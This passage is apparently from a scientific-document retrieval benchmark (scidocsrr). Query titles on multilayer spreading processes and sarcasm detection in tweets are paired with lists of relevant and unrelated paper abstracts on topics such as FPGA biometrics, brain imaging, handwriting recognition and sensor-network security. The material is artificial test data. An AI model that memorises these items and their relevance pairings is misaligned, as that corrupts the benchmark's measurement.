"docid": "9c1d8f50bd46f7c7b6e98c3c61edc67d",
"text": "This paper presents the implementation of a complete fingerprint biometric cryptosystem in a Field Programmable Gate Array (FPGA). This is possible thanks to the use of a novel fingerprint feature, named QFingerMap, which is binary, length-fixed, and ordered. Security of Authentication on FPGA is further improved because information stored is protected due to the design of a cryptosystem based on Fuzzy Commitment. Several samples of fingers as well as passwords can be fused at feature level with codewords of an error correcting code to generate non-sensitive data. System performance is illustrated with experimental results corresponding to 560 fingerprints acquired in live by an optical sensor and processed by the system in a Xilinx Virtex 6 FPGA. Depending on the realization, more or less accuracy is obtained, being possible a perfect authentication (zero Equal Error Rate), with the advantages of real-time operation, low power consumption, and a very small device.",
"title": ""
},
{
"docid": "d24afbadfd207efc065be1e2f1fcd9bb",
"text": "Two-photon microscopy has enabled anatomical and functional fluorescence imaging in the intact brain of rats. Here, we extend two-photon imaging from anesthetized, head-stabilized to awake, freely moving animals by using a miniaturized head-mounted microscope. Excitation light is conducted to the microscope in a single-mode optical fiber, and images are scanned using vibrations of the fiber tip. Microscope performance was first characterized in the neocortex of anesthetized rats. We readily obtained images of vasculature filled with fluorescently labeled blood and of layer 2/3 pyramidal neurons filled with a calcium indicator. Capillary blood flow and dendritic calcium transients were measured with high time resolution using line scans. In awake, freely moving rats, stable imaging was possible except during sudden head movements.",
"title": ""
},
{
"docid": "47ee81ef9fb8a9bc792ee6edc9a2b503",
"text": "Current image captioning approaches generate descriptions which lack specific information, such as named entities that are involved in the images. In this paper we propose a new task which aims to generate informative image captions, given images and hashtags as input. We propose a simple but effective approach to tackle this problem. We first train a convolutional neural networks long short term memory networks (CNN-LSTM) model to generate a template caption based on the input image. Then we use a knowledge graph based collective inference algorithm to fill in the template with specific named entities retrieved via the hashtags. Experiments on a new benchmark dataset collected from Flickr show that our model generates news-style image descriptions with much richer information. Our model outperforms unimodal baselines significantly with various evaluation metrics.",
"title": ""
}
] | scidocsrr |
dd596c5c848c4d819475024a637283ec | The physics of spreading processes in multilayer networks | [
{
"docid": "714843ca4a3c99bfc95e89e4ff82aeb1",
"text": "The development of new technologies for mapping structural and functional brain connectivity has led to the creation of comprehensive network maps of neuronal circuits and systems. The architecture of these brain networks can be examined and analyzed with a large variety of graph theory tools. Methods for detecting modules, or network communities, are of particular interest because they uncover major building blocks or subnetworks that are particularly densely connected, often corresponding to specialized functional components. A large number of methods for community detection have become available and are now widely applied in network neuroscience. This article first surveys a number of these methods, with an emphasis on their advantages and shortcomings; then it summarizes major findings on the existence of modules in both structural and functional brain networks and briefly considers their potential functional roles in brain evolution, wiring minimization, and the emergence of functional specialization and complex dynamics.",
"title": ""
},
{
"docid": "1fa6a26cc633adcab0f337292f84c948",
"text": "Several systems can be modeled as sets of interconnected networks or networks with multiple types of connections, here generally called multilayer networks. Spreading processes such as information propagation among users of online social networks, or the diffusion of pathogens among individuals through their contact network, are fundamental phenomena occurring in these networks. However, while information diffusion in single networks has received considerable attention from various disciplines for over a decade, spreading processes in multilayer networks is still a young research area presenting many challenging research issues. In this paper, we review the main models, results and applications of multilayer spreading processes and discuss some promising research directions.",
"title": ""
}
] | [
{
"docid": "e16213450f2094ebf1a8a77a98e4426b",
"text": "We explore the design and implementation of Frank, a strict functional programming language with a bidirectional effect type system designed from the ground up around a novel variant of Plotkin and Pretnar's effect handler abstraction. \n Effect handlers provide an abstraction for modular effectful programming: a handler acts as an interpreter for a collection of commands whose interfaces are statically tracked by the type system. However, Frank eliminates the need for an additional effect handling construct by generalising the basic mechanism of functional abstraction itself. A function is simply the special case of a Frank operator that interprets no commands. Moreover, Frank's operators can be multihandlers which simultaneously interpret commands from several sources at once, without disturbing the direct style of functional programming with values. \n Effect typing in Frank employs a novel form of effect polymorphism which avoid mentioning effect variables in source code. This is achieved by propagating an ambient ability inwards, rather than accumulating unions of potential effects outwards. \n We introduce Frank by example, and then give a formal account of the Frank type system and its semantics. We introduce Core Frank by elaborating Frank operators into functions, case expressions, and unary handlers, and then give a sound small-step operational semantics for Core Frank. \n Programming with effects and handlers is in its infancy. We contribute an exploration of future possibilities, particularly in combination with other forms of rich type system.",
"title": ""
},
{
"docid": "2ea6addaae9187d69166ab2694f9e633",
"text": "Convolutional neural networks are increasingly used outside the domain of image analysis, in particular in various areas of the natural sciences concerned with spatial data. Such networks often work out-of-the box, and in some cases entire model architectures from image analysis can be carried over to other problem domains almost unaltered. Unfortunately, this convenience does not trivially extend to data in non-euclidean spaces, such as spherical data. In this paper, we introduce two strategies for conducting convolutions on the sphere, using either a spherical-polar grid or a grid based on the cubed-sphere representation. We investigate the challenges that arise in this setting, and extend our discussion to include scenarios of spherical volumes, with several strategies for parameterizing the radial dimension. As a proof of concept, we conclude with an assessment of the performance of spherical convolutions in the context of molecular modelling, by considering structural environments within proteins. We show that the models are capable of learning non-trivial functions in these molecular environments, and that our spherical convolutions generally outperform standard 3D convolutions in this setting. In particular, despite the lack of any domain specific feature-engineering, we demonstrate performance comparable to state-of-the-art methods in the field, which build on decades of domain-specific knowledge.",
"title": ""
},
{
"docid": "63afe9cba04e97ef43bfd699d63232e3",
"text": "BACKGROUND\nMicroglial activation is a hallmark of neuroinflammation, seen in most acute and chronic neuropsychiatric conditions. With growing knowledge about microglia functions in surveying the brain for alterations, microglial activation is increasingly discussed in the context of disease progression and pathogenesis of Alzheimer's disease (AD). Underlying molecular mechanisms, however, remain largely unclear. While proper microglial function is essentially required for its scavenging duties, local activation of the brain's innate immune cells also brings about many less advantageous changes, such as reactive oxygen species (ROS) production, secretion of proinflammatory cytokines or degradation of neuroprotective retinoids, and may thus unnecessarily put surrounding healthy neurons in danger. In view of this dilemma, it is little surprising that both, AD vaccination trials, and also immunosuppressive strategies have consistently failed in AD patients. Nevertheless, epidemiological evidence has suggested a protective effect for anti-inflammatory agents, supporting the hypothesis that key processes involved in the pathogenesis of AD may take place rather early in the time course of the disorder, likely long before memory impairment becomes clinically evident. Activation of microglia results in a severely altered microenvironment. This is not only caused by the plethora of secreted cytokines, chemokines or ROS, but may also involve increased turnover of neuroprotective endogenous substances such as retinoic acid (RA), as recently shown in vitro.\n\n\nRESULTS\nWe discuss findings linking microglial activation and AD and speculate that microglial malfunction, which brings about changes in local RA concentrations in vitro, may underlie AD pathogenesis and precede or facilitate the onset of AD. Thus, chronic, \"innate neuroinflammation\" may provide a valuable target for preventive and therapeutic strategies.",
"title": ""
},
{
"docid": "8f5ca16c82dfdb7d551fdf203c9ebf7a",
"text": "We analyze a few of the commonly used statistics based and machine learning algorithms for natural language disambiguation tasks and observe that they can bc recast as learning linear separators in the feature space. Each of the methods makes a priori assumptions, which it employs, given the data, when searching for its hypothesis. Nevertheless, as we show, it searches a space that is as rich as the space of all linear separators. We use this to build an argument for a data driven approach which merely searches for a good linear separator in the feature space, without further assumptions on the domain or a specific problem. We present such an approach a sparse network of linear separators, utilizing the Winnow learning aigorlthrn and show how to use it in a variety of ambiguity resolution problems. The learning approach presented is attribute-efficient and, therefore, appropriate for domains having very large number of attributes. In particular, we present an extensive experimental comparison of our approach with other methods on several well studied lexical disambiguation tasks such as context-sensltlve spelling correction, prepositional phrase attachment and part of speech tagging. In all cases we show that our approach either outperforms other methods tried for these tasks or performs comparably to the best.",
"title": ""
},
{
"docid": "bcd0474289ba78d44853b5d278c1d2a9",
"text": "Manifold Learning (ML) is a class of algorithms seeking a low-dimensional non-linear representation of high-dimensional data. Thus, ML algorithms are most applicable to highdimensional data and require large sample sizes to accurately estimate the manifold. Despite this, most existing manifold learning implementations are not particularly scalable. Here we present a Python package that implements a variety of manifold learning algorithms in a modular and scalable fashion, using fast approximate neighbors searches and fast sparse eigendecompositions. The package incorporates theoretical advances in manifold learning, such as the unbiased Laplacian estimator introduced by Coifman and Lafon (2006) and the estimation of the embedding distortion by the Riemannian metric method introduced by Perrault-Joncas and Meila (2013). In benchmarks, even on a single-core desktop computer, our code embeds millions of data points in minutes, and takes just 200 minutes to embed the main sample of galaxy spectra from the Sloan Digital Sky Survey— consisting of 0.6 million samples in 3750-dimensions—a task which has not previously been possible.",
"title": ""
},
{
"docid": "803b681a89e6f3db34061c4b26fc2cd5",
"text": "T cells redirected to specific antigen targets with engineered chimeric antigen receptors (CARs) are emerging as powerful therapies in hematologic malignancies. Various CAR designs, manufacturing processes, and study populations, among other variables, have been tested and reported in over 10 clinical trials. Here, we review and compare the results of the reported clinical trials and discuss the progress and key emerging factors that may play a role in effecting tumor responses. We also discuss the outlook for CAR T-cell therapies, including managing toxicities and expanding the availability of personalized cell therapy as a promising approach to all hematologic malignancies. Many questions remain in the field of CAR T cells directed to hematologic malignancies, but the encouraging response rates pave a wide road for future investigation.",
"title": ""
},
{
"docid": "a1e2244c7ec4b489ac7714b47a045bb6",
"text": "In this paper we introduce a new connectionist approach to on-line handwriting recognition and address in particular the problem of recognizing handwritten whiteboard notes. The approach uses a bidirectional recurrent neural network with long short-term memory blocks. We use a recently introduced objective function, known as Connectionist Temporal Classification (CTC), that directly trains the network to label unsegmented sequence data. Our new system achieves a word recognition rate of 74.0 %, compared with 65.4 % using a previously developed HMMbased recognition system.",
"title": ""
},
{
"docid": "e2e47bef900599b0d7b168e02acf7e88",
"text": "Reflection seismic data from the F3 block in the Dutch North Sea exhibits many largeamplitude reflections at shallow horizons, typically categorized as “brightspots ” (Schroot and Schuttenhelm, 2003), mainly because of their bright appearance. In most cases, these bright reflections show a significant “flatness” contrasting with local structural trends. While flatspots are often easily identified in thick reservoirs, we have often occasionally observed apparent flatspot tuning effects at fluid contacts near reservoir edges and in thin reservoir beds, while only poorly understanding them. We conclude that many of the shallow large-amplitude reflections in block F3 are dominated by flatspots, and we investigate the thin-bed tuning effects that such flatspots cause as they interact with the reflection from the reservoir’s upper boundary. There are two possible effects to be considered: (1) the “wedge-model” tuning effects of the flatspot and overlying brightspots, dimspots, or polarity-reversals; and (2) the stacking effects that result from possible inclusion of post-critical flatspot reflections in these shallow sands. We modeled the effects of these two phenomena for the particular stratigraphic sequence in block F3. Our results suggest that stacking of post-critical flatspot reflections can cause similar large-amplitude but flat reflections, in some cases even causing an interface expected to produce a ‘dimspot’ to appear as a ‘brightspot’. Analysis of NMO stretch and muting shows the likely exclusion of critical offset data in stacked output. If post-critical reflections are included in stacking, unusual results will be observed. In the North Sea case, we conclude the tuning effect was the primary reason causing for the brightness and flatness of these reflections. However, it is still important to note that care should be taken while applying muting on reflections with wide range of incidence angles and the inclusion of critical offset data may cause some spurious features in the stacked section.",
"title": ""
},
{
"docid": "ad637c2f2257d129fa41733c9a4ca6e5",
"text": "OBJECTIVE\nTo examine the multivariate nature of risk factors for youth violence including delinquent peer associations, exposure to domestic violence in the home, family conflict, neighborhood stress, antisocial personality traits, depression level, and exposure to television and video game violence.\n\n\nSTUDY DESIGN\nA population of 603 predominantly Hispanic children (ages 10-14 years) and their parents or guardians responded to multiple behavioral measures. Outcomes included aggression and rule-breaking behavior on the Child Behavior Checklist (CBCL), as well as violent and nonviolent criminal activity and bullying behavior.\n\n\nRESULTS\nDelinquent peer influences, antisocial personality traits, depression, and parents/guardians who use psychological abuse in intimate relationships were consistent risk factors for youth violence and aggression. Neighborhood quality, parental use of domestic violence in intimate relationships, and exposure to violent television or video games were not predictive of youth violence and aggression.\n\n\nCONCLUSION\nChildhood depression, delinquent peer association, and parental use of psychological abuse may be particularly fruitful avenues for future prevention or intervention efforts.",
"title": ""
},
{
"docid": "60f94e4336d8e406097dd880f8054089",
"text": "In order to improve the retrieval accuracy of content-based image retrieval systems, research focus has been shifted from designing sophisticated low-level feature extraction algorithms to reducing the ‘semantic gap’ between the visual features and the richness of human semantics. This paper attempts to provide a comprehensive survey of the recent technical achievements in high-level semantic-based image retrieval. Major recent publications are included in this survey covering different aspects of the research in this area, including low-level image feature extraction, similarity measurement, and deriving high-level semantic features. We identify five major categories of the state-of-the-art techniques in narrowing down the ‘semantic gap’: (1) using object ontology to define high-level concepts; (2) using machine learning methods to associate low-level features with query concepts; (3) using relevance feedback to learn users’ intention; (4) generating semantic template to support high-level image retrieval; (5) fusing the evidences from HTML text and the visual content of images for WWW image retrieval. In addition, some other related issues such as image test bed and retrieval performance evaluation are also discussed. Finally, based on existing technology and the demand from real-world applications, a few promising future research directions are suggested. 2006 Pattern Recognition Society. Published by Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "eab5e6b1cf3df1d9141f9192cf59d753",
"text": "Horse racing is a popular sport in Mauritius which attracts huge crowds to Champ de Mars. Nevertheless, bettors face many difficulties in predicting winning horses to make profit. The principal factors affecting a race were determined. Each factor, namely jockeys, new horses, favourite horses, previous performance, draw, type of horses, weight, rating and stable have been examined and appropriate weights have been assigned to each of them depending on their importance. Furthermore, data for the whole racing season of 2010 was considered. The results of 240 races of 2010 have been used to determine the degree to which each factor affect the chance of each horse. The weights were then summed up to predict winners. The system can predict winners with an accuracy of 58% which is 4. 7 out of 8 winners on average. The software outperformed the predictions made by the best professional tipsters in Mauritius who could forecast only 3. 6 winners out of 8 races.",
"title": ""
},
{
"docid": "ee4288bcddc046ae5e9bcc330264dc4f",
"text": "Emerging recognition of two fundamental errors underpinning past polices for natural resource issues heralds awareness of the need for a worldwide fundamental change in thinking and in practice of environmental management. The first error has been an implicit assumption that ecosystem responses to human use are linear, predictable and controllable. The second has been an assumption that human and natural systems can be treated independently. However, evidence that has been accumulating in diverse regions all over the world suggests that natural and social systems behave in nonlinear ways, exhibit marked thresholds in their dynamics, and that social-ecological systems act as strongly coupled, complex and evolving integrated systems. This article is a summary of a report prepared on behalf of the Environmental Advisory Council to the Swedish Government, as input to the process of the World Summit on Sustainable Development (WSSD) in Johannesburg, South Africa in 26 August 4 September 2002. We use the concept of resilience--the capacity to buffer change, learn and develop--as a framework for understanding how to sustain and enhance adaptive capacity in a complex world of rapid transformations. Two useful tools for resilience-building in social-ecological systems are structured scenarios and active adaptive management. These tools require and facilitate a social context with flexible and open institutions and multi-level governance systems that allow for learning and increase adaptive capacity without foreclosing future development options.",
"title": ""
},
{
"docid": "eae289c213d5b67d91bb0f461edae7af",
"text": "China has made remarkable progress in its war against poverty since the launching of economic reform in the late 1970s. This paper examines some of the major driving forces of poverty reduction in China. Based on time series and cross-sectional provincial data, the determinants of rural poverty incidence are estimated. The results show that economic growth is an essential and necessary condition for nationwide poverty reduction. It is not, however, a sufficient condition. While economic growth played a dominant role in reducing poverty through the mid-1990s, its impacts has diminished since that time. Beyond general economic growth, growth in specific sectors of the economy is also found to reduce poverty. For example, the growth the agricultural sector and other pro-rural (vs urban-biased) development efforts can also have significant impacts on rural poverty. Notwithstanding the record of the past, our paper is consistent with the idea that poverty reduction in the future will need to rely on more than broad-based growth and instead be dependent on pro-poor policy interventions (such as national poverty alleviation programs) that can be targeted at the poor, trying to directly help the poor to increase their human capital and incomes. Determinants of Rural Poverty Reduction and Pro-poor Economic Growth in China",
"title": ""
},
{
"docid": "f6631be10fe8bbc7834ffa512906f47e",
"text": "A recent theory (Roseman, 1979,1984) attempts to specify the particular appraisals of events that elicit 16 discrete emotions. This study tested hypotheses from the latest version of the theory and compared them with hypotheses derived from appraisal theories proposed by Arnold (1960) and by Scherer (1988), using procedures designed to address some prior methodological problems. Results provided empirical support for numerous hypotheses linking particular appraisals of situational state (motive-inconsistent/motive-consistent), motivational state (punishment/reward), probability (uncertain/certain), power (weak/strong), legitimacy (negative outcome deserved/positive outcome deserved), and agency (circumstances/other person/self) to particular emotions. Where hypotheses were not supported, new appraisal-emotion relationships that revise the theory were proposed.",
"title": ""
},
{
"docid": "79f10f0b7da7710ce68d9df6212579b6",
"text": "The Internet is probably the most successful distributed computing system ever. However, our capabilities for data querying and manipulation on the internet are primordial at best. The user expectations are enhancing over the period of time along with increased amount of operational data past few decades. The data-user expects more deep, exact, and detailed results. Result retrieval for the user query is always relative o the pattern of data storage and index. In Information retrieval systems, tokenization is an integrals part whose prime objective is to identifying the token and their count. In this paper, we have proposed an effective tokenization approach which is based on training vector and result shows that efficiency/ effectiveness of proposed algorithm. Tokenization on documents helps to satisfy user’s information need more precisely and reduced search sharply, is believed to be a part of information retrieval. Pre-processing of input document is an integral part of Tokenization, which involves preprocessing of documents and generates its respective tokens which is the basis of these tokens probabilistic IR generate its scoring and gives reduced search space. The comparative analysis is based on the two parameters; Number of Token generated, Pre-processing time.",
"title": ""
},
{
"docid": "d2ee5b1556fda989e1e1a0837dfea682",
"text": "This work proposes a novel person re-identification method based on Hierarchical Bipartite Graph Matching. Because human eyes observe person appearance roughly first and then goes further into the details gradually, our method abstracts person image from coarse to fine granularity, and finally into a three layer tree structure. Then, three bipartite graph matching methods are proposed for the matching of each layer between the trees. At the bottom layer Non-complete Bipartite Graph matching is proposed to collect matching pairs among small local regions. At the middle layer Semi-complete Bipartite Graph matching is used to deal with the problem of spatial misalignment between two person bodies. Complete Bipartite Graph matching is presented to refine the ranking result at the top layer. The effectiveness of our method is validated on the CAVIAR4REID and VIPeR datasets, and competitive results are achieved on both datasets.",
"title": ""
},
{
"docid": "f6abaaeb06709e20122ef3fe07a88894",
"text": "BACKGROUND\nBullying is a problem in schools in many countries. There would be a benefit in the availability of a psychometrically sound instrument for its measurement, for use by teachers and researchers. The Olweus Bully/Victim Questionnaire has been used in a number of studies but comprehensive evidence on its validity is not available.\n\n\nAIMS\nTo examine the conceptual design, construct validity and reliability of the Revised Olweus Bully/Victim Questionnaire (OBVQ) and to provide further evidence on the prevalence of different forms of bullying behaviour.\n\n\nSAMPLE\nAll 335 pupils (160 [47.8%] girls; 175 [52.2%]) boys, mean age 11.9 years [range 11.2-12.8 years]), in 21 classes of a stratified sample of 7 Greek Cypriot primary schools.\n\n\nMETHOD\nThe OBVQ was administered to the sample. Separate scales were created comprising (a) the items of the questionnaire concerning the extent to which pupils are being victimized; and (b) those concerning the extent to which pupils express bullying behaviour. Using the Rasch model, both scales were analysed for reliability, fit to the model, meaning, and validity. Both scales were also analysed separately for each of two sample groups (i.e. boys and girls) to test their invariance.\n\n\nRESULTS\nAnalysis of the data revealed that the instrument has satisfactory psychometric properties; namely, construct validity and reliability. The conceptual design of the instrument was also confirmed. The analysis leads also to suggestions for improving the targeting of items against student measures. Support was also provided for the relative prevalence of verbal, indirect and physical bullying. As in other countries, Cypriot boys used and experienced more bullying than girls, and boys used more physical and less indirect forms of bullying than girls.\n\n\nCONCLUSIONS\nThe OBVQ is a psychometrically sound instrument that measures two separate aspects of bullying, and whose use is supported for international studies of bullying in different countries. However, improvements to the questionnaire were also identified to provide increased usefulness to teachers tackling this significant problem facing schools in many countries.",
"title": ""
},
{
"docid": "225c54aa742d510876a413ff66804b46",
"text": "Various models and derived measures of arterial function have been proposed to describe and quantify pulsatile hemodynamics in humans. A major distinction can be drawn between lumped models based on circuit theory that assume infinite pulse wave velocity versus distributed, propagative models based on transmission line theory that acknowledge finite wave velocity and account for delays, wave reflection, and spatial and temporal pressure gradients within the arterial system. Although both approaches have produced useful insights into human arterial pathophysiology, there are important limitations of the lumped approach. The arterial system is heterogeneous and various segments respond differently to cardiovascular disease risk factors including advancing age. Lumping divergent change into aggregate summary variables can obscure abnormalities in regional arterial function. Analysis of a limited number of summary variables obtained by measuring aortic input impedance may provide novel insights and inform development of new treatments aimed at preventing or reversing abnormal pulsatile hemodynamics.",
"title": ""
},
{
"docid": "da302043eecd427e70c48c28df189aa3",
"text": "Recent advances in electronics and wireless communication technologies have enabled the development of large-scale wireless sensor networks that consist of many low-power, low-cost, and small-size sensor nodes. Sensor networks hold the promise of facilitating large-scale and real-time data processing in complex environments. Security is critical for many sensor network applications, such as military target tracking and security monitoring. To provide security and privacy to small sensor nodes is challenging, due to the limited capabilities of sensor nodes in terms of computation, communication, memory/storage, and energy supply. In this article we survey the state of the art in research on sensor network security.",
"title": ""
}
] | scidocsrr |
817aa1a372f8c7653c24483d1d8bb9fb | Parsing-based sarcasm sentiment recognition in Twitter data | [
{
"docid": "d6cca63107e04f225b66e02289c601a2",
"text": "To avoid a sarcastic message being understood in its unintended literal meaning, in microtexts such as messages on Twitter.com sarcasm is often explicitly marked with a hashtag such as ‘#sarcasm’. We collected a training corpus of about 406 thousand Dutch tweets with hashtag synonyms denoting sarcasm. Assuming that the human labeling is correct (annotation of a sample indicates that about 90% of these tweets are indeed sarcastic), we train a machine learning classifier on the harvested examples, and apply it to a sample of a day’s stream of 2.25 million Dutch tweets. Of the 353 explicitly marked tweets on this day, we detect 309 (87%) with the hashtag removed. We annotate the top of the ranked list of tweets most likely to be sarcastic that do not have the explicit hashtag. 35% of the top250 ranked tweets are indeed sarcastic. Analysis indicates that the use of hashtags reduces the further use of linguistic markers for signaling sarcasm, such as exclamations and intensifiers. We hypothesize that explicit markers such as hashtags are the digital extralinguistic equivalent of non-verbal expressions that people employ in live interaction when conveying sarcasm. Checking the consistency of our finding in a language from another language family, we observe that in French the hashtag ‘#sarcasme’ has a similar polarity switching function, be it to a lesser extent. 2014 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "0f84e488b0e0b18e829aee14213dcebe",
"text": "The ability to reliably identify sarcasm and irony in text can improve the perfo rmance of many Natural Language Processing (NLP) systems including summarization, sentiment analysis, etc. The existing sar casm detection systems have focused on identifying sarcasm on a sentence level or for a specific phrase. However, often it is impos sible to identify a sentence containing sarcasm without knowing the context. In this paper we describe a corpus generation experiment w h re e collect regular and sarcastic Amazon product reviews. We perform qualitative and quantitative analysis of the corpus. The resu lting corpus can be used for identifying sarcasm on two levels: a document and a text utterance (where a text utterance can be as short as a sentence and as long as a whole document).",
"title": ""
},
{
"docid": "2314e101f501a328e3600a73dd4ee898",
"text": "Sarcasm transforms the polarity of an apparently positive or negative utterance into its opposite. We report on a method for constructing a corpus of sarcastic Twitter messages in which determination of the sarcasm of each message has been made by its author. We use this reliable corpus to compare sarcastic utterances in Twitter to utterances that express positive or negative attitudes without sarcasm. We investigate the impact of lexical and pragmatic factors on machine learning effectiveness for identifying sarcastic utterances and we compare the performance of machine learning techniques and human judges on this task. Perhaps unsurprisingly, neither the human judges nor the machine learning techniques perform very well.",
"title": ""
},
{
"docid": "79526907e23dd774c39af7398e1dcd42",
"text": "Automatic detection of emotions like sarcasm or nastiness in online written conversation is a difficult task. It requires a system that can manage some kind of knowledge to interpret that emotional language is being used. In this work, we try to provide this knowledge to the system by considering alternative sets of features obtained according to different criteria. We test a range of different feature sets using two different classifiers. Our results show that the sarcasm detection task benefits from the inclusion of linguistic and semantic information sources, while nasty language is more easily detected using only a set of surface patterns or indicators. 2014 Elsevier B.V. All rights reserved.",
"title": ""
}
] | [
{
"docid": "2a09d97b350fa249fc6d4bbf641697e2",
"text": "The goal of this study was to investigate the effect of lead and the influence of chelating agents,meso 2, 3-dimercaptosuccinic acid (DMSA) and D-Penicillamine, on the biochemical contents of the brain tissues of Catla catla fingerlings by Fourier Transform Infrared Spectroscopy. FT-IR spectra revealed significant differences in absorbance intensities between control and lead-intoxicated brain tissues, reflecting a change in protein and lipid contents in the brain tissues due to lead toxicity. In addition, the administration of chelating agents, DMSA and D-Penicillamine, improved the protein and lipid contents in the brain tissues compared to lead-intoxicated tissues. Further, DMSA was more effective in reducing the body burden of lead. The protein secondary structure analysis revealed that lead intoxication causes an alteration in protein profile with a decrease in α-helix and an increase in β-sheet structure of Catla catla brain. In conclusion, the study demonstrated that FT-IR spectroscopy could differentiate the normal and lead-intoxicated brain tissues due to intrinsic differences in intensity.",
"title": ""
},
{
"docid": "52f6e2d0ce0923f923293e2c154fb08c",
"text": "We present a novel Dynamic Bayesian Network for pedestrian path prediction in the intelligent vehicle domain. The model incorporates the pedestrian situational awareness, situation criticality and spatial layout of the environment as latent states on top of a Switching Linear Dynamical System (SLDS) to anticipate changes in the pedestrian dynamics. Using computer vision, situational awareness is assessed by the pedestrian head orientation, situation criticality by the distance between vehicle and pedestrian at the expected point of closest approach, and spatial layout by the distance of the pedestrian to the curbside. Our particular scenario is that of a crossing pedestrian, who might stop or continue walking at the curb. In experiments using stereo vision data obtained from a vehicle, we demonstrate that the proposed approach results in more accurate path prediction than only SLDS, at the relevant short time horizon (1 s), and slightly outperforms a computationally more demanding state-of-the-art method.",
"title": ""
},
{
"docid": "db31a8887bfc1b24c2d2c2177d4ef519",
"text": "The equilibrium microstructure of a fluid may only be described exactly in terms of a complete set of n-body atomic distribution functions, where n is 1, 2, 3 , . . . , N, and N is the total number of particles in the system. The higher order functions, i. e. n > 2, are complex and practically inaccessible but con siderable qualitative information can already be derived from studies of the mean radial occupation function n(r) defined as the average number of atoms in a sphere of radius r centred on a particular atom. The function for a perfect gas of non-inter acting particles is",
"title": ""
},
{
"docid": "c1d436c01088c2295b35a1a37e922bee",
"text": "Tourism is an important part of national economy. On the other hand it can also be a source of some negative externalities. These are mainly environmental externalities, resulting in increased pollution, aesthetic or architectural damages. High concentration of visitors may also lead to increased crime, or aggressiveness. These may have negative effects on quality of life of residents and negative experience of visitors. The paper deals with the influence of tourism on destination environment. It highlights the necessity of sustainable forms of tourism and activities to prevent negative implication of tourism, such as education activities and tourism monitoring. Key-words: Tourism, Mass Tourism, Development, Sustainability, Tourism Impact, Monitoring.",
"title": ""
},
{
"docid": "2bab927c0e06da044bd0e8dea3b832a9",
"text": "R is a popular language and programming environment for data scientists. It is increasingly co-packaged with both relational and Hadoop-based data platforms and can often be the most dominant computational component in data analytics pipelines. Recent work has highlighted inefficiencies in executing R programs, both in terms of execution time and memory requirements, which in practice limit the size of data that can be analyzed by R. This paper presents ROSA, a static analysis framework to improve the performance and space efficiency of R programs. ROSA analyzes input programs to determine program properties such as reaching definitions, live variables, aliased variables, and types of variables. These inferred properties enable program transformations such as C++ code translation, strength reduction, vectorization, code motion, in addition to interpretive optimizations such as avoiding redundant object copies and performing in-place evaluations. An empirical evaluation shows substantial reductions by ROSA in execution time and memory consumption over both CRAN R and Microsoft R Open.",
"title": ""
},
{
"docid": "c967b56cc7a2046cb34cfea25dd702d7",
"text": "We present GJ, a design that extends the Java programming language with generic types and methods. These are both explained and implemented by translation into the unextended language. The translation closely mimics the way generics are emulated by programmers: it erases all type parameters, maps type variables to their bounds, and inserts casts where needed. Some subtleties of the translation are caused by the handling of overriding.GJ increases expressiveness and safety: code utilizing generic libraries is no longer buried under a plethora of casts, and the corresponding casts inserted by the translation are guaranteed to not fail.GJ is designed to be fully backwards compatible with the current Java language, which simplifies the transition from non-generic to generic programming. In particular, one can retrofit existing library classes with generic interfaces without changing their code.An implementation of GJ has been written in GJ, and is freely available on the web.",
"title": ""
},
{
"docid": "b51d531c2ff106124f96a4287e466b90",
"text": "Detecting buildings from very high resolution (VHR) aerial and satellite images is extremely useful in map making, urban planning, and land use analysis. Although it is possible to manually locate buildings from these VHR images, this operation may not be robust and fast. Therefore, automated systems to detect buildings from VHR aerial and satellite images are needed. Unfortunately, such systems must cope with major problems. First, buildings have diverse characteristics, and their appearance (illumination, viewing angle, etc.) is uncontrolled in these images. Second, buildings in urban areas are generally dense and complex. It is hard to detect separate buildings from them. To overcome these difficulties, we propose a novel building detection method using local feature vectors and a probabilistic framework. We first introduce four different local feature vector extraction methods. Extracted local feature vectors serve as observations of the probability density function (pdf) to be estimated. Using a variable-kernel density estimation method, we estimate the corresponding pdf. In other words, we represent building locations (to be detected) in the image as joint random variables and estimate their pdf. Using the modes of the estimated density, as well as other probabilistic properties, we detect building locations in the image. We also introduce data and decision fusion methods based on our probabilistic framework to detect building locations. We pick certain crops of VHR panchromatic aerial and Ikonos satellite images to test our method. We assume that these crops are detected using our previous urban region detection method. Our test images are acquired by two different sensors, and they have different spatial resolutions. Also, buildings in these images have diverse characteristics. Therefore, we can test our methods on a diverse data set. Extensive tests indicate that our method can be used to automatically detect buildings in a robust and fast manner in Ikonos satellite and our aerial images.",
"title": ""
},
{
"docid": "81c6c8572f34d4ba431ed8bca3df5f83",
"text": "Inspired by the compliance found in many organisms, soft robots are made almost entirely out of flexible, soft material, making them suitable for applications in uncertain, dynamic task environments, including safe human-robot interactions. Their intrinsic compliance absorbs shocks and protects them against mechanical impacts. However, the soft materials used for their construction are highly susceptible to damage, such as cuts and perforations caused by sharp objects present in the uncontrolled and unpredictable environments they operate in. In this research, we propose to construct soft robotics entirely out of self-healing elastomers. On the basis of healing capacities found in nature, these polymers are given the ability to heal microscopic and macroscopic damage. Diels-Alder polymers, being thermoreversible covalent networks, were used to develop three applications of self-healing soft pneumatic actuators (a soft gripper, a soft hand, and artificial muscles). Soft pneumatic actuators commonly experience perforations and leaks due to excessive pressures or wear during operation. All three prototypes were designed using finite element modeling and mechanically characterized. The manufacturing method of the actuators exploits the self-healing behavior of the materials, which can be recycled. Realistic macroscopic damage could be healed entirely using a mild heat treatment. At the location of the scar, no weak spots were created, and the full performance of the actuators was nearly completely recovered after healing.",
"title": ""
},
{
"docid": "0d6960b2817f98924f7de3b7d7774912",
"text": "Visual textures have played a key role in image understanding because they convey important semantics of images, and because texture representations that pool local image descriptors in an orderless manner have had a tremendous impact in diverse applications. In this paper we make several contributions to texture understanding. First, instead of focusing on texture instance and material category recognition, we propose a human-interpretable vocabulary of texture attributes to describe common texture patterns, complemented by a new describable texture dataset for benchmarking. Second, we look at the problem of recognizing materials and texture attributes in realistic imaging conditions, including when textures appear in clutter, developing corresponding benchmarks on top of the recently proposed OpenSurfaces dataset. Third, we revisit classic texture represenations, including bag-of-visual-words and the Fisher vectors, in the context of deep learning and show that these have excellent efficiency and generalization properties if the convolutional layers of a deep model are used as filter banks. We obtain in this manner state-of-the-art performance in numerous datasets well beyond textures, an efficient method to apply deep features to image regions, as well as benefit in transferring features from one domain to another.",
"title": ""
},
{
"docid": "c6dd1546b19703a69bc25f3a881d783b",
